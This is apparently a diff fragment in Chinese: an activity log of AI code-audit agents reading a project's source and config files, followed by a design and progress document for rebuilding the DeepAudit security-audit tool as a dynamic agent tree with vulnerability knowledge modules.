|
||||
Recon
|
||||
2ms
|
||||
14:39:45
|
||||
Recon
|
||||
Thought: 我需要继续查看app.py文件,特别是路由定义部分,以了解应用程序的API端点。让我继续读取文件的后续部分。
|
||||
14:39:50
|
||||
Completed: read_file
|
||||
Recon
|
||||
6ms
|
||||
14:40:57
|
||||
Recon
|
||||
Thought: 我需要继续查看app.py文件的最后部分,以了解所有的API路由。让我读取文件的剩余部分。
|
||||
14:41:04
|
||||
Completed: read_file
|
||||
Recon
|
||||
23ms
|
||||
14:41:37
|
||||
Recon
|
||||
Thought: 我需要查看app.py文件的最后部分,以了解所有的API路由。让我读取文件的最后部分。
|
||||
14:41:40
|
||||
Completed: read_file
|
||||
Recon
|
||||
5ms
|
||||
14:42:03
|
||||
Recon
|
||||
Thought: 现在我已经查看了app.py文件,了解了主要的API路由和应用程序结构。接下来,我需要查看MindSpider/main.py文件,以了解爬虫组件的主要功能。
|
||||
14:42:08
|
||||
Completed: read_file
|
||||
Recon
|
||||
3ms
|
||||
14:42:16
|
||||
Recon
|
||||
Thought: 我需要继续查看MindSpider/main.py文件的剩余部分,以了解爬虫组件的主要功能。
|
||||
14:42:18
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:43:42
|
||||
Recon
|
||||
Thought: 我需要继续查看MindSpider/main.py文件的剩余部分,以了解爬虫组件的主要功能。
|
||||
14:43:45
|
||||
Completed: read_file
|
||||
Recon
|
||||
4ms
|
||||
14:43:48
|
||||
Recon
|
||||
Thought: 现在我已经查看了MindSpider/main.py文件,了解了爬虫组件的主要功能。接下来,我需要查看配置文件,以了解项目的配置结构和敏感信息。
|
||||
14:43:51
|
||||
Completed: read_file
|
||||
Recon
|
||||
5ms
|
||||
14:43:53
|
||||
Recon
|
||||
Thought: 我需要继续查看config.py文件的剩余部分,以了解项目的完整配置结构。
|
||||
14:43:55
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:43:57
|
||||
Recon
|
||||
Thought: 现在我已经查看了config.py文件,了解了项目的配置结构。接下来,我需要查看.env.example文件,以了解环境变量的配置示例。
|
||||
14:44:00
|
||||
Completed: read_file
|
||||
Recon
|
||||
14ms
|
||||
14:44:00
|
||||
✅ recon Agent 完成
|
||||
Orchestrator
|
||||
14:44:00
|
||||
Orchestrator
|
||||
Thought: 多次尝试使用 recon 和 analysis Agent 都没有返回任何有用的信息。这可能是因为项目结构复杂或者 Agent 无法正确访问文件。我将尝试一个更直接的方法,先查看项目的根目录文件,特别关注配置文件和主要入口文件,然后再进行深入分析。
|
||||
14:44:04
|
||||
📤 调度 recon Agent: 查看项目根目录下的所有文件,特别关注config.py, app.py, report_engine_only.py, requirements.txt等关键文件...
|
||||
Orchestrator
|
||||
14:45:23
|
||||
Recon
|
||||
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和主要文件。这将帮助我识别项目类型、技术栈和关键组件。我将从列出根目录的内容开始。
|
||||
14:45:26
|
||||
Completed: list_files
|
||||
Recon
|
||||
2ms
|
||||
14:46:04
|
||||
Recon
|
||||
Thought: 我已经看到了项目的根目录结构。这是一个多引擎的项目,包含多个子模块如ForumEngine、InsightEngine、MediaEngine等。我注意到根目录下有app.py和config.py,这表明这可能是一个Python项目。接下来,我应该查看requirements.txt文件来了解项目的依赖和技术栈,同时也要查看config.py来了解项目配置。
|
||||
14:46:07
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:46:08
|
||||
Recon
|
||||
Thought: 从requirements.txt文件可以看出,这是一个基于Python的舆情分析系统,使用了多种技术栈:
|
||||
1. Web框架:Flask、Streamlit、FastAPI
|
||||
2. 数据库:MySQL (pymysql, aiomysql)、SQLite (aiosqlite)、Redis、PostgreSQL (asyncpg)
|
||||
3. 数据处理:pandas, numpy, jieba (中文分词)
|
||||
4. 机器学习:torch, transformers, sentence-transformers等
|
||||
5. 爬虫:playwright, beautifulsoup4等
|
||||
6. 可视化:plotly, matplotlib, wordcloud
|
||||
|
||||
接下来,我应该查看config.py文件来了解项目的配置信息,然后查看app.py作为主入口点。
|
||||
14:46:14
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:46:15
|
||||
Recon
|
||||
Thought: 从config.py文件可以看出,这是一个复杂的舆情分析系统,包含多个AI代理引擎(Insight Engine、Media Engine、Query Engine、Report Engine、MindSpider等)。系统使用Flask作为Web框架,支持多种数据库(MySQL、PostgreSQL),并集成了多个LLM API(如Kimi、Gemini、DeepSeek等)。
|
||||
|
||||
接下来,我应该查看app.py文件,这是主入口点,可以了解系统的路由和主要功能。
|
||||
14:46:18
|
||||
Completed: read_file
|
||||
Recon
|
||||
|
|
@ -0,0 +1,527 @@
|
|||
DeepAudit Agent 架构重构升级方案
|
||||
一、现状分析
|
||||
当前 DeepAudit 架构特点
|
||||
DeepAudit 目前采用基于 LangGraph 的固定流程图架构。整个审计流程按照 Recon(信息收集)→ Analysis(漏洞分析)→ Verification(漏洞验证)→ Report(报告生成)的线性顺序执行。每个阶段由一个专门的 Agent 负责,Agent 之间通过 TaskHandoff 机制传递结构化的上下文信息。
|
||||
|
||||
这种架构的优点是流程清晰、易于理解和调试,但存在几个明显的局限性:
|
||||
|
||||
第一,流程过于固定。无论面对什么类型的项目或漏洞,都必须走完整个流程,无法根据实际发现动态调整策略。比如发现了一个 SQL 注入线索,无法立即深入分析,必须等待 Analysis 阶段统一处理。
|
||||
|
||||
第二,Agent 专业化程度不足。Analysis Agent 需要同时处理所有类型的漏洞,从 SQL 注入到 XSS 到 SSRF,这导致系统提示词过于庞大,LLM 难以在每种漏洞类型上都表现出专家级水平。
|
||||
|
||||
第三,缺乏动态协作能力。Agent 之间只能按照预设的顺序传递信息,无法根据需要动态创建新的 Agent 或在 Agent 之间进行实时通信。
|
||||
|
||||
Strix 架构的启示
|
||||
Strix 是一个开源的 AI 安全测试 Agent 项目,它采用了完全不同的架构理念。通过深入分析 Strix 的设计,我们可以获得以下关键启示:
|
||||
|
||||
Strix 的核心是动态 Agent 树结构。根 Agent 可以根据任务需要随时创建子 Agent,每个子 Agent 专注于特定的漏洞类型或任务。子 Agent 完成后向父 Agent 汇报结果,父 Agent 可以根据结果决定是否需要创建更多子 Agent 或进行其他操作。
|
||||
|
||||
Strix 的另一个亮点是模块化的专业知识系统。它为每种漏洞类型都准备了详细的 Jinja2 模板,包含该漏洞的检测方法、利用技术、绕过手段、验证步骤等专业知识。创建 Agent 时可以指定加载哪些知识模块,让 Agent 在特定领域具备专家级能力。
|
||||
|
||||
此外,Strix 还实现了 Agent 间的消息传递机制、完善的状态管理、工具的沙箱执行、LLM 调用优化等高级特性。
|
||||
|
||||
二、升级后的整体架构
|
||||
核心设计理念
|
||||
升级后的 DeepAudit 将采用"动态 Agent 协作 + 专业知识模块 + 智能编排"的三层架构。
|
||||
|
||||
最底层是专业知识模块层,包含各种漏洞类型、框架、技术栈的专业知识库。这些知识以模板形式存储,可以按需加载到 Agent 的系统提示词中。
|
||||
|
||||
中间层是 Agent 执行层,包含可动态创建和销毁的 Agent 实例。每个 Agent 都有完整的生命周期管理,可以执行任务、调用工具、与其他 Agent 通信。
|
||||
|
||||
最上层是智能编排层,负责根据审计目标和实时发现来协调整个审计流程,决定何时创建什么类型的 Agent,如何分配任务,何时结束审计。
|
||||
|
||||
动态 Agent 树
|
||||
与当前固定的四阶段流程不同,升级后的系统将采用动态 Agent 树结构。
|
||||
|
||||
审计开始时,系统创建一个根 Agent(Root Agent)。根 Agent 首先进行初步的信息收集,了解项目的技术栈、目录结构、入口点等基本信息。然后根据收集到的信息,根 Agent 决定需要创建哪些专业子 Agent。
|
||||
|
||||
例如,如果发现项目使用了 SQL 数据库,根 Agent 可能会创建一个专门的 SQL 注入检测 Agent;如果发现有用户输入直接渲染到页面的代码,可能会创建一个 XSS 检测 Agent;如果发现有 HTTP 请求的代码,可能会创建一个 SSRF 检测 Agent。
|
||||
|
||||
每个子 Agent 专注于自己的任务领域。当子 Agent 发现可疑的漏洞线索时,它可以进一步创建验证子 Agent 来确认漏洞是否真实存在。验证通过后,还可以创建报告子 Agent 来生成正式的漏洞报告。
|
||||
|
||||
这种树状结构的好处是:任务可以无限细分,每个 Agent 都能专注于自己擅长的领域;发现和验证可以并行进行,提高效率;根据实际情况动态调整策略,而不是机械地执行固定流程。
|
||||
|
||||
Agent 间通信机制
|
||||
升级后的系统将实现完善的 Agent 间通信机制。
|
||||
|
||||
每个 Agent 都有一个消息队列,其他 Agent 可以向这个队列发送消息。消息类型包括:查询消息(请求信息)、指令消息(要求执行某个操作)、信息消息(分享发现或状态)。
|
||||
|
||||
当 Agent 处于等待状态时,它会检查自己的消息队列。如果有新消息,Agent 会处理消息并可能恢复执行。这种机制使得 Agent 之间可以进行实时协作,而不仅仅是单向的结果传递。
|
||||
|
||||
例如,SQL 注入检测 Agent 在分析过程中发现某个函数可能存在问题,但需要了解这个函数的调用上下文。它可以向根 Agent 发送查询消息,请求提供相关信息。根 Agent 收到消息后,可以调用代码搜索工具获取信息,然后回复给 SQL 注入检测 Agent。
|
||||
|
||||
Agent 状态管理
|
||||
每个 Agent 都有完整的状态管理,状态信息包括:
|
||||
|
||||
基本信息:Agent 的唯一标识、名称、父 Agent 标识、创建时间等。
|
||||
|
||||
任务信息:当前任务描述、任务上下文、从父 Agent 继承的信息等。
|
||||
|
||||
执行状态:当前迭代次数、最大迭代限制、运行状态(运行中、等待中、已完成、失败、已停止)等。
|
||||
|
||||
对话历史:与 LLM 的完整对话记录,包括系统提示词、用户消息、助手回复等。
|
||||
|
||||
执行记录:已执行的动作列表、观察结果列表、错误记录等。
|
||||
|
||||
发现列表:该 Agent 发现的所有漏洞和可疑点。
|
||||
|
||||
这种完整的状态管理使得 Agent 可以被暂停和恢复,可以被序列化和持久化,也便于调试和审计。
|
||||
|
||||
三、专业知识模块系统
|
||||
模块化设计
|
||||
专业知识模块是升级后架构的核心创新之一。我们将为不同的漏洞类型、框架、技术栈创建专门的知识模块。
|
||||
|
||||
漏洞类型模块包括:SQL 注入、XSS、SSRF、IDOR、认证绕过、远程代码执行、路径遍历、XXE、CSRF、竞态条件、反序列化、业务逻辑漏洞等。每个模块都包含该漏洞类型的完整知识体系。
|
||||
|
||||
框架知识模块包括:FastAPI、Django、Flask、Express、Next.js、Spring、Laravel 等主流框架。每个模块包含该框架的安全特性、常见漏洞模式、最佳实践等。
|
||||
|
||||
技术栈模块包括:Supabase、Firebase、GraphQL、gRPC、WebSocket 等。每个模块包含该技术的安全考量和常见问题。
|
||||
|
||||
模块内容结构
|
||||
以 SQL 注入模块为例,它应该包含以下内容:
|
||||
|
||||
漏洞概述:SQL 注入的定义、危害、影响范围。
|
||||
|
||||
检测方法:错误型注入检测、布尔型注入检测、时间型注入检测、带外注入检测的具体技术和判断标准。
|
||||
|
||||
数据库特定知识:MySQL、PostgreSQL、MSSQL、Oracle 等不同数据库的特有语法、函数、利用技术。
|
||||
|
||||
绕过技术:WAF 绕过、过滤绕过、编码绕过等高级技术。
|
||||
|
||||
ORM 和查询构建器:各种 ORM 框架中容易出现 SQL 注入的 API 和模式。
|
||||
|
||||
验证步骤:如何确认漏洞真实存在,如何构造 PoC,如何评估影响。
|
||||
|
||||
误报识别:哪些情况容易被误判为 SQL 注入,如何排除误报。
|
||||
|
||||
修复建议:参数化查询、ORM 正确用法、输入验证等修复方案。
|
||||
|
||||
模块加载机制
|
||||
创建 Agent 时,可以指定该 Agent 需要加载哪些知识模块。系统会将这些模块的内容动态注入到 Agent 的系统提示词中。
|
||||
|
||||
为了控制提示词长度和保持 Agent 的专注度,每个 Agent 最多加载 5 个知识模块。这个限制迫使我们为每个 Agent 选择最相关的知识,而不是试图让一个 Agent 掌握所有知识。
|
||||
|
||||
模块之间可以有依赖关系。例如,FastAPI 框架模块可能依赖 Python 安全基础模块;GraphQL 模块可能依赖 API 安全基础模块。加载模块时会自动处理这些依赖。
|
||||
|
||||
四、工具系统升级
|
||||
统一的工具注册机制
|
||||
升级后的工具系统将采用装饰器模式进行统一注册。每个工具都需要提供:工具名称、功能描述、参数定义、返回值说明。
|
||||
|
||||
工具按类别组织,包括:文件操作类(读取文件、搜索文件、列出目录)、代码分析类(模式匹配、数据流分析、AST 分析)、外部扫描类(Semgrep、Bandit、Gitleaks 等)、验证执行类(沙箱命令执行、HTTP 请求)、协作类(创建子 Agent、发送消息、等待消息)、推理类(思考工具)、报告类(创建漏洞报告)。
|
||||
|
||||
Think 工具
|
||||
Think 工具是借鉴自 Strix 的关键设计。这是一个让 Agent 进行深度推理的工具,Agent 可以用它来:
|
||||
|
||||
分析复杂情况:当面对复杂的代码逻辑或不确定的漏洞线索时,Agent 可以调用 Think 工具进行深入思考。
|
||||
|
||||
规划下一步行动:在执行具体操作之前,先用 Think 工具规划策略。
|
||||
|
||||
评估发现的严重性:发现可疑点后,用 Think 工具评估其真实性和影响。
|
||||
|
||||
决定是否需要创建子 Agent:当任务变得复杂时,用 Think 工具分析是否需要分解任务。
|
||||
|
||||
Think 工具的输出会被记录到 Agent 的对话历史中,帮助 LLM 保持思路的连贯性。
|
||||
|
||||
漏洞报告工具
|
||||
漏洞报告工具是正式记录漏洞的唯一方式。只有通过这个工具创建的漏洞才会被计入最终报告。这个设计确保了漏洞报告的规范性和完整性。
|
||||
|
||||
报告工具要求提供完整的漏洞信息:漏洞类型、严重程度、标题、详细描述、文件位置、代码片段、PoC、影响分析、修复建议等。
|
||||
|
||||
通常只有专门的报告 Agent 才会调用这个工具,确保漏洞在被正式报告之前已经经过了充分的验证。
|
||||
|
||||
沙箱执行
|
||||
涉及代码执行或网络请求的工具都在沙箱环境中运行。沙箱提供资源隔离(CPU、内存、网络限制)、文件系统隔离、超时控制等安全保障。
|
||||
|
||||
沙箱执行通过 Tool Server 机制实现。Agent 发送工具调用请求到 Tool Server,Tool Server 在沙箱中执行工具并返回结果。这种设计使得即使工具执行出现问题,也不会影响主系统的稳定性。
|
||||
|
||||
五、LLM 调用优化
|
||||
Prompt Caching
|
||||
对于支持 Prompt Caching 的 LLM(如 Anthropic Claude),系统会自动为系统提示词和早期对话添加缓存标记。这样在多轮对话中,这些内容只需要处理一次,后续调用可以直接使用缓存,显著降低 Token 消耗和响应延迟。
|
||||
|
||||
缓存策略会根据对话长度动态调整。对于短对话,只缓存系统提示词;对于长对话,会在关键位置添加多个缓存点。
|
||||
|
||||
Memory Compression
|
||||
当对话历史变得很长时,系统会自动进行压缩。压缩策略包括:
|
||||
|
||||
移除冗余信息:重复的工具调用结果、过长的代码输出等会被截断或摘要。
|
||||
|
||||
合并相似消息:连续的同类型消息可能被合并。
|
||||
|
||||
保留关键信息:重要的发现、决策点、错误信息等会被优先保留。
|
||||
|
||||
压缩后的对话历史仍然保持语义完整性,LLM 可以理解之前发生了什么,但 Token 消耗大大降低。
|
||||
|
||||
智能重试
|
||||
LLM 调用可能因为各种原因失败:网络问题、速率限制、服务不可用等。系统实现了智能重试机制:
|
||||
|
||||
对于可重试的错误(如速率限制),会等待适当时间后重试。
|
||||
|
||||
对于不可重试的错误(如认证失败),会立即报错并提供清晰的错误信息。
|
||||
|
||||
重试时会使用指数退避策略,避免对 LLM 服务造成过大压力。
|
||||
|
||||
六、审计流程重构
|
||||
启动阶段
|
||||
用户发起审计请求后,系统首先创建根 Agent。根 Agent 加载通用的安全审计知识模块和项目相关的框架知识模块。
|
||||
|
||||
根 Agent 的第一个任务是信息收集:扫描项目目录结构、识别技术栈、找出入口点、分析依赖关系。这个阶段类似于当前的 Recon 阶段,但更加灵活。
|
||||
|
||||
任务分解阶段
|
||||
根据信息收集的结果,根 Agent 决定如何分解审计任务。它会考虑:
|
||||
|
||||
项目使用了哪些技术?需要创建哪些专业 Agent?
|
||||
|
||||
有哪些高风险区域?应该优先分析哪些部分?
|
||||
|
||||
项目规模如何?需要多少并行 Agent?
|
||||
|
||||
根 Agent 会创建一批初始的子 Agent,每个子 Agent 负责特定的漏洞类型或代码区域。
|
||||
|
||||
并行分析阶段
|
||||
多个子 Agent 并行工作,各自在自己的专业领域进行深入分析。
|
||||
|
||||
每个子 Agent 都有自己的工作循环:思考当前状态、选择工具执行、观察结果、决定下一步。这个循环会持续进行,直到 Agent 认为任务完成或达到迭代限制。
|
||||
|
||||
子 Agent 在分析过程中可能会发现需要进一步调查的线索。这时它可以创建更专业的子 Agent 来处理,形成多层的 Agent 树。
|
||||
|
||||
验证阶段
|
||||
当分析 Agent 发现可疑的漏洞时,它会创建验证 Agent 来确认漏洞是否真实存在。
|
||||
|
||||
验证 Agent 会尝试构造 PoC、进行数据流追踪、在沙箱中测试等。验证通过后,验证 Agent 会创建报告 Agent 来生成正式的漏洞报告。
|
||||
|
||||
如果验证失败,验证 Agent 会将结果反馈给父 Agent,父 Agent 可以决定是否需要进一步调查或将其标记为误报。
|
||||
|
||||
汇总阶段
|
||||
当所有子 Agent 都完成工作后,根 Agent 会汇总所有发现,生成最终的审计报告。
|
||||
|
||||
报告包括:发现的所有漏洞(按严重程度排序)、安全评分、技术栈分析、高风险区域标注、修复建议优先级等。
|
||||
|
||||
七、可观测性和调试
|
||||
完整的事件追踪
|
||||
系统会记录所有重要事件:Agent 创建和销毁、工具调用和结果、LLM 请求和响应、Agent 间消息、状态变更等。
|
||||
|
||||
这些事件可以实时推送到前端,让用户看到审计的进展。也可以持久化到数据库,用于后续分析和审计。
|
||||
|
||||
Agent 树可视化
|
||||
前端可以展示当前的 Agent 树结构,显示每个 Agent 的状态、任务、发现数量等信息。用户可以点击任何 Agent 查看其详细信息和对话历史。
|
||||
|
||||
调试模式
|
||||
在调试模式下,系统会记录更详细的信息,包括完整的 LLM 提示词和响应、工具执行的详细日志、状态变更的完整历史等。这些信息对于排查问题和优化系统非常有价值。
|
||||
|
||||
八、与现有架构的兼容
|
||||
渐进式迁移
|
||||
升级不需要一次性完成,可以渐进式进行。
|
||||
|
||||
第一步,保持现有的 LangGraph 流程不变,但将 Agent 的状态管理升级为新的模型。
|
||||
|
||||
第二步,引入专业知识模块系统,让现有的 Analysis Agent 可以加载不同的知识模块。
|
||||
|
||||
第三步,在 Analysis 阶段内部引入子 Agent 机制,允许创建专业的漏洞检测子 Agent。
|
||||
|
||||
第四步,逐步放开流程限制,让 Agent 可以更灵活地决定下一步操作。
|
||||
|
||||
第五步,完全迁移到动态 Agent 树架构。
|
||||
|
||||
保留 LangGraph 的优势
|
||||
LangGraph 提供了很好的状态管理和检查点机制,这些在新架构中仍然有价值。我们可以将 LangGraph 用于根 Agent 的高层编排,而在子 Agent 层面使用更灵活的动态创建机制。
|
||||
|
||||
九、预期收益
|
||||
更深度的漏洞发现
|
||||
专业知识模块让每个 Agent 都具备安全专家级别的知识。专注于单一漏洞类型的 Agent 比通用 Agent 更容易发现深层次的问题。
|
||||
|
||||
更高的效率
|
||||
并行的 Agent 执行比串行流程更快。动态任务分解避免了在无关区域浪费时间。
|
||||
|
||||
更低的成本
|
||||
Prompt Caching 和 Memory Compression 显著降低 Token 消耗。专业化的 Agent 使用更短的提示词就能达到更好的效果。
|
||||
|
||||
更好的可扩展性
|
||||
添加新的漏洞类型只需要创建新的知识模块。支持新的框架只需要添加框架知识模块。整个系统的扩展不需要修改核心架构。
|
||||
|
||||
更强的可解释性
|
||||
完整的事件追踪和 Agent 树可视化让用户清楚地了解系统在做什么。Think 工具的输出展示了 Agent 的推理过程。
|
||||
|
||||
这个升级方案借鉴了 Strix 的核心设计理念,同时保留了 DeepAudit 的既有优势,通过渐进式迁移降低风险,最终实现一个更强大、更灵活、更专业的安全审计 Agent 系统。
|
||||
|
||||
|
||||
---
|
||||
|
||||
## 十、实施进度记录
|
||||
|
||||
### 已完成的工作 (2024-12)
|
||||
|
||||
#### 1. 核心模块系统 ✅
|
||||
- `core/state.py`: 增强的Agent状态管理,支持完整生命周期
|
||||
- `core/registry.py`: Agent注册表和动态Agent树管理
|
||||
- `core/message.py`: Agent间通信机制(消息总线)
|
||||
|
||||
#### 2. 专业知识模块系统 ✅ (基于RAG)
|
||||
采用模块化文件组织,统一使用RAG进行知识检索:
|
||||
|
||||
```
|
||||
knowledge/
|
||||
├── base.py # 基础定义(KnowledgeDocument, KnowledgeCategory)
|
||||
├── loader.py # 知识加载器
|
||||
├── rag_knowledge.py # RAG检索系统
|
||||
├── tools.py # 知识查询工具
|
||||
├── vulnerabilities/ # 漏洞类型知识
|
||||
│ ├── injection.py # SQL注入、NoSQL注入、命令注入、代码注入
|
||||
│ ├── xss.py # 反射型XSS、存储型XSS、DOM型XSS
|
||||
│ ├── auth.py # 认证绕过、IDOR、访问控制失效
|
||||
│ ├── crypto.py # 弱加密、硬编码凭证
|
||||
│ ├── ssrf.py # SSRF
|
||||
│ ├── deserialization.py # 不安全的反序列化
|
||||
│ ├── path_traversal.py # 路径遍历
|
||||
│ ├── xxe.py # XXE
|
||||
│ └── race_condition.py # 竞态条件
|
||||
└── frameworks/ # 框架安全知识
|
||||
├── fastapi.py # FastAPI安全
|
||||
├── django.py # Django安全
|
||||
├── flask.py # Flask安全
|
||||
├── express.py # Express.js安全
|
||||
├── react.py # React安全
|
||||
└── supabase.py # Supabase安全
|
||||
```
|
||||
|
||||
#### 3. Agent基类增强 ✅
|
||||
- 支持动态Agent树(parent_id, 子Agent创建)
|
||||
- Agent间消息通信
|
||||
- TaskHandoff协作机制
|
||||
- 知识模块加载
|
||||
- Memory Compression集成
|
||||
|
||||
#### 4. 工具系统 ✅
|
||||
- `thinking_tool.py`: Think和Reflect工具
|
||||
- `reporting_tool.py`: 漏洞报告工具
|
||||
- `agent_tools.py`: Agent协作工具
|
||||
- CreateSubAgentTool: 动态创建子Agent
|
||||
- SendMessageTool: Agent间消息发送
|
||||
- ViewAgentGraphTool: 查看Agent树
|
||||
- WaitForMessageTool: 等待消息
|
||||
- AgentFinishTool: 子Agent完成报告
|
||||
|
||||
#### 5. LLM调用优化 ✅
|
||||
- `memory_compressor.py`: 对话历史压缩
|
||||
- 自动检测是否需要压缩
|
||||
- 保留关键信息(发现、工具使用、决策、错误)
|
||||
- 智能摘要生成
|
||||
- Agent基类集成自动压缩
|
||||
|
||||
#### 6. Orchestrator Agent ✅
|
||||
- LLM驱动的编排决策
|
||||
- 动态调度子Agent
|
||||
- ReAct模式执行
|
||||
|
||||
### 已完成的工作 (2024-12 续)
|
||||
|
||||
#### 7. Prompt Caching ✅
|
||||
- `llm/prompt_cache.py`: Prompt 缓存管理器
|
||||
- 支持 Anthropic Claude 的 Prompt Caching
|
||||
- 动态缓存策略(SYSTEM_ONLY, SYSTEM_AND_EARLY, MULTI_POINT)
|
||||
- 缓存统计和效果追踪
|
||||
- Token 估算工具
|
||||
- LiteLLM 适配器集成缓存支持
|
||||
|
||||
#### 8. 动态Agent树执行器 ✅
|
||||
- `core/executor.py`: 完整的执行器实现
|
||||
- `DynamicAgentExecutor`: 动态Agent树执行器
|
||||
- 并行Agent执行(带信号量控制)
|
||||
- 任务依赖管理
|
||||
- 执行结果汇总
|
||||
- 超时和取消处理
|
||||
- `SubAgentExecutor`: 子Agent执行器
|
||||
- 从父Agent创建和执行子Agent
|
||||
- 并行子Agent执行
|
||||
- 结果收集和汇总
|
||||
- `ExecutionTask`: 执行任务数据结构
|
||||
- `ExecutionResult`: 执行结果数据结构
|
||||
|
||||
#### 9. Agent状态持久化 ✅
|
||||
- `core/persistence.py`: 持久化模块
|
||||
- `AgentStatePersistence`: 状态持久化管理器
|
||||
- 文件系统持久化
|
||||
- 数据库持久化(可选)
|
||||
- 检查点列表和清理
|
||||
- `CheckpointManager`: 检查点管理器
|
||||
- 自动检查点(按迭代间隔)
|
||||
- 检查点恢复
|
||||
- 状态回滚
|
||||
|
||||
#### 10. 增强的Agent协作工具 ✅
|
||||
- `CreateSubAgentTool`: 增强版
|
||||
- 支持立即执行模式
|
||||
- 集成SubAgentExecutor
|
||||
- 上下文传递
|
||||
- `RunSubAgentsTool`: 批量执行子Agent
|
||||
- 并行/顺序执行
|
||||
- 结果汇总
|
||||
- `CollectSubAgentResultsTool`: 收集子Agent结果
|
||||
|
||||
#### 11. 数据库模型扩展 ✅
|
||||
- `AgentCheckpoint`: Agent检查点模型
|
||||
- 状态数据存储
|
||||
- 执行统计
|
||||
- 检查点类型(auto/manual/error/final)
|
||||
- `AgentTreeNode`: Agent树节点模型
|
||||
- 树结构记录
|
||||
- 执行状态追踪
|
||||
- 结果汇总
|
||||
- Alembic迁移脚本: `007_add_agent_checkpoint_tables.py`
|
||||
|
||||
#### 12. API 端点 ✅
|
||||
- `GET /agent-tasks/{task_id}/agent-tree`: Agent树查询API
|
||||
- 返回完整的Agent树结构
|
||||
- 支持运行时内存查询和数据库查询
|
||||
- 包含执行状态和发现统计
|
||||
- `GET /agent-tasks/{task_id}/checkpoints`: 检查点列表API
|
||||
- 支持按Agent ID过滤
|
||||
- 分页支持
|
||||
- `GET /agent-tasks/{task_id}/checkpoints/{checkpoint_id}`: 检查点详情API
|
||||
- 返回完整的Agent状态数据
|
||||
|
||||
### 已完成的工作 (2024-12 续2)
|
||||
|
||||
#### 13. 前端 Agent 审计页面 ✅ (Strix-inspired Terminal UI)
|
||||
- `frontend/src/shared/api/agentTasks.ts`: 扩展 API
|
||||
- `AgentTreeNode`, `AgentTreeResponse` 类型定义
|
||||
- `AgentCheckpoint`, `CheckpointDetail` 类型定义
|
||||
- `getAgentTree()`: 获取 Agent 树结构
|
||||
- `getAgentCheckpoints()`: 获取检查点列表
|
||||
- `getCheckpointDetail()`: 获取检查点详情
|
||||
|
||||
- `frontend/src/pages/AgentAudit.tsx`: 统一的 Agent 审计页面 (参考 Strix TUI 设计)
|
||||
- **布局**: 左侧活动日志 (75%) + 右侧 Agent 树和统计 (25%)
|
||||
- **启动画面**: ASCII Art + 动画加载效果
|
||||
- **活动日志**:
|
||||
- 实时流式显示 Agent 思考过程
|
||||
- 工具调用和结果展示
|
||||
- 漏洞发现高亮
|
||||
- 自动滚动控制
|
||||
- 可折叠的日志条目
|
||||
- **Agent 树可视化**:
|
||||
- 树状结构展示
|
||||
- 节点状态图标(运行中/已完成/失败/等待)
|
||||
- 发现数量徽章
|
||||
- 节点选择交互
|
||||
- **实时统计面板**:
|
||||
- 进度百分比
|
||||
- 文件分析进度
|
||||
- Token 使用量
|
||||
- 发现数量
|
||||
- 严重程度分布
|
||||
- **创建任务对话框**: 选择项目后直接跳转到实时流页面
|
||||
- **任务控制**: 停止/取消任务
|
||||
|
||||
- `frontend/src/app/routes.tsx`: 路由配置
|
||||
- `/agent-audit`: 启动画面 + 创建任务
|
||||
- `/agent-audit/:taskId`: 任务实时流页面
|
||||
|
||||
- `frontend/src/components/layout/Sidebar.tsx`: 侧边栏导航
|
||||
- 新增 Agent 审计入口图标
|
||||
|
||||
### 已完成的工作 (2024-12 续3)
|
||||
|
||||
#### 14. 执行架构切换 ✅
|
||||
- **移除旧的 LangGraph 固定流程架构**
|
||||
- **启用新的动态 Agent 树架构**
|
||||
- `backend/app/api/v1/endpoints/agent_tasks.py`:
|
||||
- `_execute_agent_task()` 重写为使用 `OrchestratorAgent`
|
||||
- OrchestratorAgent 作为大脑,动态调度子 Agent
|
||||
- 子 Agent: ReconAgent, AnalysisAgent, VerificationAgent
|
||||
- 新增辅助函数: `_get_user_config()`, `_initialize_tools()`, `_collect_project_info()`, `_save_findings()`, `_calculate_security_score()`
|
||||
|
||||
### 待完成的工作
|
||||
|
||||
#### 1. 前端增强
|
||||
- 知识模块选择 UI(创建任务时)
|
||||
- 检查点恢复功能
|
||||
- 导出报告功能
|
||||
|
||||
#### 2. 测试和优化
|
||||
- 单元测试
|
||||
- 集成测试
|
||||
- 性能优化
|
||||
- 并发执行压力测试
|
||||
|
||||
#### 3. 文档
|
||||
- API文档更新
|
||||
- 架构图更新
|
||||
- 使用指南
|
||||
|
||||
---
|
||||
|
||||
## 十一、架构升级总结
|
||||
|
||||
### 已实现的核心功能
|
||||
|
||||
1. **Prompt Caching** - 为 Claude 等 LLM 提供缓存支持,减少 Token 消耗
|
||||
2. **动态 Agent 树执行** - OrchestratorAgent 作为大脑,动态调度子 Agent
|
||||
3. **Agent 状态持久化** - 文件系统持久化,并可选启用数据库持久化
|
||||
4. **检查点机制** - 自动检查点、状态恢复、执行历史追踪
|
||||
5. **增强的协作工具** - 子 Agent 创建、批量执行、结果收集
|
||||
6. **完整的 API 支持** - Agent 树查询、检查点管理
|
||||
7. **旧架构已移除** - 不再使用 LangGraph 固定流程,完全切换到动态 Agent 树
|
||||
|
||||
### 文件清单
|
||||
|
||||
```
|
||||
backend/app/services/
|
||||
├── llm/
|
||||
│ ├── __init__.py # 模块导出
|
||||
│ ├── prompt_cache.py # 🆕 Prompt Caching
|
||||
│ ├── memory_compressor.py # Memory Compression
|
||||
│ └── adapters/
|
||||
│ └── litellm_adapter.py # 集成 Prompt Caching
|
||||
│
|
||||
├── agent/
|
||||
│ ├── core/
|
||||
│ │ ├── __init__.py # 模块导出
|
||||
│ │ ├── state.py # Agent 状态管理
|
||||
│ │ ├── registry.py # Agent 注册表
|
||||
│ │ ├── message.py # Agent 间通信
|
||||
│ │ ├── executor.py # 🆕 动态 Agent 树执行器
|
||||
│ │ └── persistence.py # 🆕 状态持久化
|
||||
│ │
|
||||
│ ├── tools/
|
||||
│ │ ├── __init__.py # 模块导出
|
||||
│ │ ├── agent_tools.py # 🔄 增强的协作工具
|
||||
│ │ ├── thinking_tool.py # Think/Reflect 工具
|
||||
│ │ └── reporting_tool.py # 漏洞报告工具
|
||||
│ │
|
||||
│ ├── knowledge/ # 专业知识模块
|
||||
│ │ ├── vulnerabilities/ # 漏洞类型知识
|
||||
│ │ └── frameworks/ # 框架安全知识
|
||||
